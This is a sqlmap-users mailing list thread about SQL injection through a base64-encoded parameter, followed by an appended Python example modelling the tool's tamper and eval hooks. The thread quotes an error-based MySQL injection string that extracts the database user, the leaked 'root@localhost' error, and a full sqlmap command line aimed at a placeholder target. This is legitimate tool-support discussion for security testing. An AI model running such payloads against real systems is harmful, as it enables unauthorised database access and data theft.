Then please try --eval instead of --tamper. E.g. --eval="param=param.encode('base64')"
Bye

On Nov 2, 2014 5:42 PM, "Konrads Smelkovs" <konr...@smelkovs.com> wrote:
> Miroslav,
>
> I previously exploited this manually. The injection occurs in the mysql
> INSERT statement. If the statement is invalid, we get an error message in
> html comments like so:
>
> <!--You have an error in your SQL syntax; check the manual that
> corresponds to your MySQL server version for the right syntax to use near
> ''lalalaa))) or'')' at line 1-->
>
> Which then is exploitable using some well documented methods such as
> appending a string like this:
> ' or extractvalue(1,concat(0x7e,(SELECT user()))) or'
>
> which gives us a nice error:
> <!--XPATH syntax error: '~root@localhost'-->
>
> Anyhow, I got halfway there with the following string:
> sqlmap -u 'https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337' --tamper=base64encode --dbms=mysql -v 3 --proxy=http://localhost:8080
>
> sqlmap sends correctly encoded test vectors, but it doesn't send the
> correct initial URL stability check vector:
>
> 1st request URL:
> https://target/script.php?data=DATA:User=Test,CC=4512634722348842,CVV=1337
> 2nd request URL:
> https://target/script.php?data=REFUQTpVc2VyPVRlc3QsQ0M9NDUxMjYzNDcyMjM0ODg0MixDVlY9MTMzNy4uIlsnJ1suKSg%3D
>
> Also none of the test vectors seem to trigger an error response.
>
> I tried with --risk=3 to no avail.
>
> version: 1.0-dev-1ef2c40
>
> --
> Konrads Smelkovs
> Applied IT sorcery.
>
> On 30 October 2014 13:12, Miroslav Stampar <miroslav.stam...@gmail.com> wrote:
>
>> Hi.
>>
>> In your case I would do this:
>>
>> 1) Decode the original base64 value and give it to sqlmap in decoded form
>> (e.g. id=123 instead of original id=313233)
>> 2) Use --tamper=base64encode
>>
>> Kind regards,
>> Miroslav Stampar
>>
>> On Thu, Oct 30, 2014 at 1:15 PM, Konrads Smelkovs <konr...@smelkovs.com> wrote:
>>
>>> Hello,
>>>
>>> I am writing a small modification which would allow tampering with/decoding
>>> variables in the request?
>>> As I understand it, the parameters are decoded/parsed into a dict
>>> after option.py:2323 (parseTargetDirect()), but where can I access the
>>> full, parsed dict of the get/post/cookie values?
>>>
>>> (specifically I have a base64 encoded string as a parameter and to
>>> insert the payload, the parameter must be base64-decoded, injected and
>>> then encoded back)
>>>
>>> --
>>> Konrads Smelkovs
>>> Applied IT sorcery.
>>>
>>> ------------------------------------------------------------------------------
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
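An added example, not code from the thread or from sqlmap itself: a minimal Python model of the two hooks discussed above, showing why a tamper script leaves the initial stability-check request unencoded while --eval transforms the parameter on every request. The two pipeline functions and the assumption that tamper scripts run only on payload-bearing requests are mine, not sqlmap's internals.

```python
# Added example (not from the thread or from sqlmap): a model of the two hooks.
# Assumption: sqlmap applies a --tamper script only to requests that carry an
# injection test vector, while --eval code runs before every request is built.
import base64
from typing import Optional

# Decoded parameter value taken from the thread (the server expects it base64-encoded).
ORIGINAL_VALUE = "DATA:User=Test,CC=4512634722348842,CVV=1337"


def b64(text: str) -> str:
    """Base64-encode a str the Python 3 way (no trailing newline)."""
    return base64.b64encode(text.encode()).decode()


def tamper_pipeline(value: str, payload: Optional[str]) -> str:
    """Model of --tamper=base64encode: the tamper script sees only requests that
    carry a test vector, so the stability check (payload=None) goes out unencoded."""
    if payload is None:
        return value                      # raw value: the server cannot base64-decode it
    return b64(value + payload)


def eval_pipeline(value: str, payload: Optional[str]) -> str:
    """Model of --eval: the snippet runs before every request, so the stability
    check and the test requests all reach the server base64-encoded."""
    param = value + (payload or "")
    return b64(param)


def compare(payload: str) -> dict:
    """Return (baseline, with-vector) parameter values per hook for a constructed vector."""
    return {
        "tamper": (tamper_pipeline(ORIGINAL_VALUE, None), tamper_pipeline(ORIGINAL_VALUE, payload)),
        "eval": (eval_pipeline(ORIGINAL_VALUE, None), eval_pipeline(ORIGINAL_VALUE, payload)),
    }


if __name__ == "__main__":
    # Constructed placeholder vector; only the encoding behaviour matters here.
    for hook, (baseline, with_vector) in compare("<constructed test vector>").items():
        print(f"{hook:6} baseline: {baseline}")
        print(f"{hook:6} vector:   {with_vector}")
```

Note that the Python 2 codec in the reply above, .encode('base64'), appends a trailing newline to its output and does not exist as a text encoding on Python 3, whereas base64.b64encode gives the bare encoding on both.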